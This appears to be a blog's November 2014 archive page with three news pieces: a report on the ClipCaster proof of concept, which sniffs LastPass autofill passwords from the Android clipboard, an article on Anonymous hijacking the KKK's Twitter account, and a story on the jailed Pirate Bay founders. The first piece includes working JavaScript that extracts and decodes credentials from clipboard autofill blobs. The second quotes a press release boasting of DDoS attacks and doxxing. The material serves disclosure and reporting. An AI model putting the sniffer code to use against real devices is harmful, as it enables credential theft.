Monthly Archives: November 2014


In early 2013, researchers exposed some unsettling risks stemming from Android-based password managers. In a paper titled “Hey, You, Get Off of My Clipboard,” they documented how passwords managed by 21 of the most popular such apps could be accessed by any other app on an Android device, even those with extremely low-level privileges. They suggested several measures to help fix the problem.

Almost two years later, the threat remains viable in at least some, if not all, of the apps originally analyzed. An app recently made available on Google Play, for instance, has no trouble divining the passwords managed by LastPass, one of the leading managers on the market, as well as the lesser-known KeePassDroid. With additional work, it’s likely that the proof-of-concept ClipCaster app would work seamlessly against many other managers, too, said Xiao Bao Clark, the Australia-based programmer who developed it. While ClipCaster does nothing more than display the plaintext of passwords that LastPass and KeePassDroid funnel through Android handsets, a malicious app with only network privileges could send the credentials to an attacker without the user having any idea what was happening.

“Besides the insecurity of it, what annoyed me was that I was never told any of this while I was signing up or setting up the LastPass app,” Clark wrote in an e-mail. “Instead, I got the strong impression from LastPass that everything was very secure, and I needn’t worry about any of it. If they at least told users the security issues using these features brings, then the users themselves could decide on their own trade-off between usability and security. Not mentioning it at all strikes me as disingenuous.”

Asked if LastPass has ever notified users of the risk, company CEO Joe Siegrist didn’t give a yes or no answer. Instead, he responded, “This is an any clipboard activity problem [his emphasis] and impacts any password manager involving the clipboard (100% of them)—the way all password managers have consistently allowed you to enter your password into other apps since Android has existed. This demonstration is aimed at LastPass, but it’s the whole of Android that must be addressed.”

Clark agreed that any Android-based password manager that uses the OS clipboard is susceptible, and he strongly recommends that people stop using any app setup that works this way. Many managers instead use standalone browsers, browser extensions, or software keyboards to enter credentials into login fields, and there is no evidence those methods are susceptible to sniffing. The reason ClipCaster takes special aim at LastPass, Clark said, is simple: it just happened to be the manager he installed on his phone. There are no reports that password managers running on iOS or Windows Phone are vulnerable, but there is no way to know for sure, since Ars is unaware of any comprehensive study testing the security of managers on those platforms.

As already alluded to, the threat stems from the use of the Android clipboard, which acts as a temporary cache for text being copied and pasted, either within the same app or from one app to another. Android has no official programming interface that secures the clipboard: by design, its contents are readable by any app installed on the phone, from the highest-privileged banking app to one holding no permissions at all. (ClipCaster, for instance, requests no permissions.) Siegrist rightly noted that any password manager that makes use of the Android clipboard, and there are plenty, including LastPass, is vulnerable.

LastPass has several different methods for plucking passwords out of its highly fortified vault and plugging them into the password field of a browser or app. Not all of the options are susceptible to sniffing, but notably, the one LastPass recommends that Android users choose leaves them wide open. That option is known as autofill, a feature that seamlessly plugs passwords into apps and the Chrome browser.

Shortly after installing LastPass, Clark came across the 2013 paper that discussed the clipboard vulnerability. It got him wondering about the security of his decision, so he began analyzing the JavaScript autofill uses to populate username and password fields in Chrome. In about an hour, he had a crude but working exploit that monitored the Android clipboard and captured login credentials transported by autofill. His proof-of-concept app works by listening for the notices the clipboard broadcasts to installed apps whenever its contents change and looking for familiar patterns in the code.

Clark concocted a dummy account containing the username “j.doe@actisec.com” and the password “s4f3p4assw0rd,” and observed the way the credentials were funneled through the clipboard. Autofill wrote a blob of JavaScript to the clipboard and then pasted it into the address bar of Chrome. The code contained the following telltale lines:

if (l_bte) {
    l_sfv(l_bte, decodeURIComponent(escape(atob('ai5kb2VAYWN0aXNlYy5jb20='))));
}
l_sfv(l_bpe, decodeURIComponent(escape(atob('czRmZXBhc3N3MHJk'))));

[Image: ClipCaster sniffing the password “s4f3p4assw0rd” as a user logs in to Facebook. Credit: Xiao Bao Clark]

“atob” is a JavaScript function that decodes base64-encoded strings; the surrounding decodeURIComponent(escape(...)) call turns the decoded bytes back into UTF-8 text. Presumably, LastPass developers chose the encoding to make it less obvious to other apps what the clipboard contains. But to anyone with a modest amount of training, the measure is little more than an exercise in the largely discredited protection known as “security through obscurity”: base64 is an encoding, not encryption, and anything that can read the clipboard can reverse it. ClipCaster monitors the clipboard for the patterns, decodes the base64 strings and, as illustrated in the image above, displays them.
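The decoding step ClipCaster performs, written out as an added example (this is not ClipCaster's code, nor LastPass's). It runs under Node.js and uses Buffer for the base64-to-UTF-8 step that the blob's own decodeURIComponent(escape(atob(...))) chain performs in a browser. The sample clipboard text is constructed here: only the two l_sfv(...) lines and their base64 strings come from the article; the surrounding function wrapper and the variable assignments are assumptions about the shape of the blob. Note that the two base64 strings as printed above decode to “j.doe@actisec.com” and “s4fepassw0rd” (the caption spells the password “s4f3p4assw0rd”; the quoted blob does not encode that exact string), which is what the example reports.

```javascript
// Added example: recover plaintext credentials from a LastPass-autofill-style
// clipboard blob, the way a clipboard sniffer such as ClipCaster would.
// Node.js; Buffer is used instead of atob so multi-byte UTF-8 passwords decode
// correctly.

// Constructed sample of a clipboard payload. Only the two l_sfv(...) calls and
// their base64 strings are taken from the article; the rest is an assumed wrapper.
const SAMPLE_CLIP = `
(function () {
  var l_bte = document.querySelector('input[type=email]');
  var l_bpe = document.querySelector('input[type=password]');
  if (l_bte) {
    l_sfv(l_bte, decodeURIComponent(escape(atob('ai5kb2VAYWN0aXNlYy5jb20='))));
  }
  l_sfv(l_bpe, decodeURIComponent(escape(atob('czRmZXBhc3N3MHJk'))));
})();`;

// Matches l_sfv(<target>, decodeURIComponent(escape(atob('<base64>')))) and
// captures the target variable name and the base64 payload. The four closing
// parentheses close atob, escape, decodeURIComponent and l_sfv respectively.
const FILL_CALL =
  /l_sfv\(\s*(\w+)\s*,\s*decodeURIComponent\(escape\(atob\('([A-Za-z0-9+\/=]+)'\)\)\)\)/g;

// Equivalent of decodeURIComponent(escape(atob(b64))): base64 -> bytes -> UTF-8.
function decodeField(b64) {
  return Buffer.from(b64, 'base64').toString('utf8');
}

// Returns null when the text does not look like an autofill blob (no password
// fill present); otherwise the decoded username (may be null) and password.
function extractCredentials(clipText) {
  const fills = {};
  for (const m of clipText.matchAll(FILL_CALL)) {
    fills[m[1]] = decodeField(m[2]);
  }
  if (!('l_bpe' in fills)) return null;
  return { username: fills.l_bte ?? null, password: fills.l_bpe };
}

// On Android the sniffer would register a ClipboardManager primary-clip-changed
// listener and feed each new clip's text through extractCredentials(); here the
// function is simply run over the constructed sample and over ordinary text.
console.log(extractCredentials(SAMPLE_CLIP));
console.log(extractCredentials('just some copied text'));
```

The regex is deliberately tied to the exact call shape, which is all a sniffer needs: the base64 wrapper adds no secrecy, so the only thing standing between any zero-permission app and the credential is pattern matching.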

In e-mails sent to Ars, Siegrist, the LastPass CEO, rightly noted that the vulnerability isn’t unique to his company’s product, or even to Android devices.

“This is an OS-level issue that impacts everything running on Android,” he said. “If you use the clipboard to copy any data, a malicious app could obtain it—like installing clipboard monitoring software on Windows or a keylogger on Windows. You can compromise your security by installing bad software.”

Siegrist also noted that attacks like the one carried out by ClipCaster work only when LastPass or another password manager runs on an Android device that has a malicious app installed, and then only when the manager uses the device’s clipboard. The CEO said that LastPass users should run only “trusted” apps, meaning those distributed over Google Play by a trusted company and widely used and reviewed.

Still, his statements omit some important distinctions. First, Clark’s research found that LastPass on Windows doesn’t use the clipboard to pass login credentials to Chrome, and presumably not to other browsers either. Second, most Windows users—and a growing number of Mac users as well—run antivirus protection that can detect such threats. Android antivirus apps exist, but there’s little evidence that most users install one. Third, his advice about installing only trusted apps is sound, but given the regular occurrence of malicious apps that slip through Google’s defenses and are hosted in the company’s official Play Store, it’s unrealistic to expect end users to always spot rogue titles.

One of the key defenses of Android is its application sandbox, which prevents one app from accessing sensitive data belonging to another app, presumably under the premise that not all apps will be trustworthy. When an app as sensitive as a password manager doesn’t enjoy a protection as crucial as this, the companies should make this limitation explicit. LastPass and the developers of other vulnerable managers should be forthright about the risks and tell users what they can do to protect themselves. In the case of LastPass, the threat can be eliminated simply by opting out of the recommended autofill option and instead using the LastPass browser or LastPass keyboard. Many users may decide the convenience of autofill is worth the added risk, but at least they will be making an informed choice.



Summary: On Nov 14, 2014, the online hacktivist collective Anonymous released a YouTube video announcing a cyber attack on the Ku Klux Klan (a white supremacist Christian group) over its threats to use lethal force at the Ferguson protests. As a result, Anonymous hacked the official Twitter account of the KKK USA.

After taking over the KKK’s Twitter account, Anonymous posted a number of tweets bashing the group for ignoring previous warnings to stop interfering in the Ferguson protests.

Here are screenshots of some of the tweets posted by Anonymous from the KKK’s Twitter account.

[Screenshots: tweets posted from the KKK Twitter account after the takeover]

This tweet was posted by the KKK itself, just a few hours before the account was hacked by what the group had dismissed as “a bunch of wannabes”.

At the time of publishing this article, the KKK’s Twitter account was still under the control of Anonymous.

More about Operation KKK: 

Here is a press release sent by Anonymous to various media outlets:

KKK, it has come to our unfortunate attention that you have been interfering with Anonymous. We are not attacking you because of what you believe in, as we fight for freedom of speech… We are attacking you because of what you did to our brothers and sisters at the Ferguson protest on the 12th of November. Due to your actions we have started Operation KKK. The aim of our operation is nothing more than Cyber Warfare. Anything you upload will be taken down, anything you use to promote the KKK will be shut down.
DDoS attacks have already been sent and have infiltrated your servers over the past 2 days… d0x's have also been launched on leaders of the KKK. All information retrieved will be given to the public. You messed with our family and now we will mess with yours… Let the cyber war begin. We are legion. We do not forgive. We do not forget. Ku Klux Klan, you should have expected us.

Watch the YouTube video uploaded by Anonymous below:

What is the Ferguson protest for?

On 9 August 2014, 18-year-old Michael Brown was shot dead by an officer of the Ferguson Police Department. Anonymous conducted cyber attacks and on-the-ground protests against the Ferguson Police Department under the banner of #OpFerguson.

The grand jury investigation into the August 9 shooting of 18-year-old Michael Brown by Ferguson police officer Darren Wilson is expected to announce its decision in the next few days, and according to the New York Times, protesters are already preparing for it.

This is not the first time Anonymous has hacked a white supremacist group. In the past, a Mississippi-based white supremacist organization, The Nationalist Movement (nationalist.org), had its website hacked by Anons under #OpAntifa.


Pirate Bay Is Still Online, Even Though All of Its Founders Are in Custody

November 7, 2014

The men behind the internet’s most popular piracy hub, the Pirate Bay, have had a particularly bad week, which is not too out of the ordinary for a group of hackers who are acutely aware of law enforcement troubles, international manhunts, prison time, solitary confinement, and telling Hollywood to go fuck itself.

First there was the Halloween sentencing of one of the Pirate Bay’s co-founders, 30-year-old Gottfrid Svartholm-Warg. He was sentenced to three-and-a-half years behind bars in Denmark. He was found guilty of hacking into the Danish wing of a company called the Computer Sciences Corporation. CSC is also in the news right now for allegedly developing billing fraud schemes, alongside the City of New York itself, that may have defrauded New York State’s Medicaid system. Across the pond, Svartholm was accused of hacking into CSC’s Danish databases, which a court in Copenhagen found to have included “criminal records and drivers’ license records.”

Svartholm-Warg had previously been hiding out in Cambodia, but was extradited to Sweden, where he was held in solitary confinement before facing trial in Denmark. Svartholm-Warg was running from a one-year prison sentence the Swedes had handed down for his role in founding the Pirate Bay. Those original Pirate Bay-related charges sparked a massive protest movement in Sweden.

I spoke to Rickard Falkvinge, the founder of the Pirate Party, about the legal nightmare of the Pirate Bay crew. On the subject of Svartholm-Warg’s extradition from Cambodia, he told me, “For some reason [the authorities] were throwing everything they had at a computer repair guy out in the rural parts of Cambodia, and it certainly had nothing to do with an extra 59.4 million US dollars in foreign aid from Sweden to Cambodia that was handed over at the same time.”

At the time, his extradition to Sweden caused plenty of undesirable attention for both the Swedes and the Cambodians. Within Wikileaks’ extensive documentation pertaining to Svartholm-Warg’s case, the Swedish Foreign Ministry’s press director is quoted as writing: “We are getting a lot of questions from all four corners of the Earth regarding [Svartholm-Warg]. Many journalists are personally involved, is my impression. I think the pressure on the embassy [in Cambodia] will diminish now that he’s coming to Sweden.”

In Sweden, Svartholm-Warg faced hacking charges similar to the ones he was recently convicted of in Denmark. He was accused of hacking into both Nordea, a Swedish bank, and Logica, an IT firm. Only the charges pertaining to Logica stuck, but Svartholm-Warg has maintained his innocence throughout, stating that someone nefarious had accessed his computer remotely to carry out the hacks. Svartholm-Warg was then deported to Denmark despite his best efforts, arguing that he was being tried for the same crimes twice. This is a perplexing argument, given that the Danish charges pertained to his alleged hack of CSC, not Logica or Nordea, for which the Swedes went after him.

In Denmark, Svartholm-Warg used the same defense, namely that he was framed and his computer was hacked. The prosecution dismissed this argument, but Svartholm-Warg’s legal team called in Jacob Appelbaum, the noted computer security researcher and Tor developer, who testified to the contrary. His lawyers also presented “an antivirus scan of his computer showing that 545 threats had been found on it, some of which were capable of providing a hacker with remote control of the computer.”

Svartholm-Warg’s argument is plausible, in that he has certainly made plenty of powerful enemies simply from running the Pirate Bay. Wikileaks has also pointed out that he played a role in the infamous “Collateral Murder” project, wherein Wikileaks released previously classified video footage of an American Apache helicopter mistakenly bombing journalists.

As if Svartholm-Warg’s multinational, convoluted legal woes weren’t enough, one of the other Pirate Bay founders, Fredrik Neij, who had fled to Asia after being charged in Sweden, was arrested in Thailand earlier this week. According to Falkvinge, “Fredrik had been one of the tech guys running the site, and according to clips from the movie TPB AFK, he was basically planning to wait out the statute of limitations in the wonderful climate.”

Neij had been living in Laos, and reportedly was a frequent traveler to Thailand. While he has not yet been sent to Sweden to serve time on his copyright infringement charges, that is expected to happen sooner rather than later. Neij was the last remaining Pirate Bay founder to evade incarceration.

The third founder of the Pirate Bay is Peter Sunde, a man Rickard Falkvinge describes as “mediagenic.” Sunde expects to be released from prison this month. Falkvinge told me Sunde’s role in the Pirate Bay was very minor. In a lengthy statement written for Falkvinge’s blog and published after his plea, Sunde states that his conviction came about after “having sent an invoice for advertising on the Pirate Bay once in April 2006 (almost a year after the events on trial started).”

He also claims he was advised by police to get a cheap lawyer, discusses how Stockholm Police’s “lead interrogator” on his case took a job with Warner Brothers during the trial, and how he once felt as if he were “the most hated person in the power corridors of Hollywood.”

Sunde is likely to take on new entrepreneurial projects upon his release. I spoke to him in July 2013 about an encrypted message app he was working on before being imprisoned, one that would combine the security of encryption with the beautiful graphic interface of, say, the iPhone.

The Guardian caught up with Sunde recently, where he discussed his newfound friendship with a cocaine smuggler who bakes vegan muffins, the poor treatment he receives in jail outside of said muffins, and how he was able to encrypt all of his computer systems through a keystroke on his smartphone at the moment of his arrest, which understandably infuriated his arresting officer.

Despite having its three most prominent organizers in custody (along with a fourth man—the supposed financier Carl Lundström, who currently sports an electronic ankle bracelet in Switzerland) the Pirate Bay is alive and well.

Yesterday, according to the Pirate Bay’s own statistics—which are published on its homepage—the torrent tracker had over 48 million connected users, sharing nearly 7 million torrents. In his post-plea statement from 2012, Sunde bragged that “The Pirate Bay was back online [immediately after the initial raid]. It’s an easy service to copy, and with no advanced functionality. That was one of the major features with the underlying technology, being smart and easily maintained to that level. It was so easy to maintain, nobody had practically touched it for a year at the time of the raid.”

According to Falkvinge, the four men’s “real crime was talking back at Hollywood monopolists, which embarrassed the Swedish establishment.”

In the face of international pressure, the Pirate Bay is infamous for the clever maneuvers that keep it online. At one point, the site’s administrators were considering placing its servers on drones that would float above international waters to circumvent copyright legislation written in pesky land-bound nations. And, just recently, the site began using its advertising space to promote a free VPN, which allows users in countries like Iceland (which have recently banned access to the Pirate Bay outright) to reach the site.
